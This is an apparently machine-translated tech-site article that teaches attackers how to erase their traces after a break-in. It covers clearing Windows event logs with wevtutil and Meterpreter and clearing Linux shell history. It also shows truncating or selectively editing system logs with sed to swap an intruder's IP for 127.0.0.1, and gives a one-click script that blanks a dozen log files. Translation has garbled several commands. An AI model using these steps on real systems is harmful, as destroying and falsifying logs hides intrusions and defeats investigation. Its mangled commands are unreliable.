Shulou(Shulou.com)06/03 Report--

This article mainly introduces "the methods and steps of cleaning traces in the post-infiltration stage". In the daily operation, I believe that many people have doubts about the methods and steps of cleaning traces in the post-infiltration stage. The editor consulted all kinds of materials and sorted out the simple and useful operation methods. I hope it will be helpful for everyone to answer the doubts about the methods and steps of cleaning traces in the post-infiltration stage. Next, please follow the editor to study!

I. Preface

After the penetration is completed, in order to reduce the probability of being found and traced, it is necessary for attackers to remove their own attack traces. This paper summarizes the ways of cleaning traces on windows and linux respectively.

II. Windows

Delete logs manually when you have remote Desktop permissions:

Start-programs-Administrative tools-computer Management-system tools-event Viewer-clear Log

Wevtutil:

Wevtutil el lists all log names in the system wevtutil cl system cleanup Syslog wevtutil cl application cleanup application log wevtutil cl security cleanup security log

Meterperter comes with the ability to clear logs:

Clearev clears the application log, system log, and security log in windows

Clear recent:

In File Explorer, click "View"-> "options"-> in General-> Privacy, click the "clear" button or directly open C:\ Users\ Administrator\ Recent and delete everything or enter del / f / s / Q "% userprofile%\ Recent*.* on the command line. 3, linux.

Clear command history

Histroy-r # Delete the current session history history-c # Delete all command history in memory rm .bash _ history # Delete the contents of the history file HISTZISE=0 # clear all history records by setting the number of history commands execute commands in hidden locations execute commands using vim to open files execute commands: set commands

Linux log file

/ var/run/utmp record now logged in user / var/log/wtmp record all user login and logout / var/log/lastlog record each user's last login time / var/log/btmp record incorrect login attempt / var/log/auth.log actions requiring identity confirmation / var/log/secure log security related log information / var/log/maillog log message related log information / var / log/message records system startup messages and error logs / var/log/cron records log information related to scheduled tasks / var/log/spooler records log information related to UUCP and news devices / var/log/boot.log records log messages related to daemon startup and stop

Completely delete the log file:

Cat / dev/null > filename: > filename > filenameecho "" > filenameecho > filename

Delete log files specifically:

Delete sed-I'/ date of the day / 'd filename

Tamper with the log file:

Replace all 172.16.13.1, ip with 127.0.0.1sed-I's pick 170.170.64.17max 127.0.0.1hand g'

One click to clear the script:

#! / usr/bin/bashecho > / var/log/syslogecho > / var/log/messagesecho > / var/log/httpd/access_logecho > / var/log/httpd/error_logecho > / var/log/xferlogecho > / var/log/secureecho > / var/log/auth.logecho > / var/log/user.logecho > / var/log/wtmpecho > / var/log/lastlogecho > / var/log/btmpecho > / var/run/utmprm ~ /. / bash_historyhistory-c so far The study on the methods and steps of cleaning traces in the post-infiltration stage is over. I hope to be able to solve everyone's doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.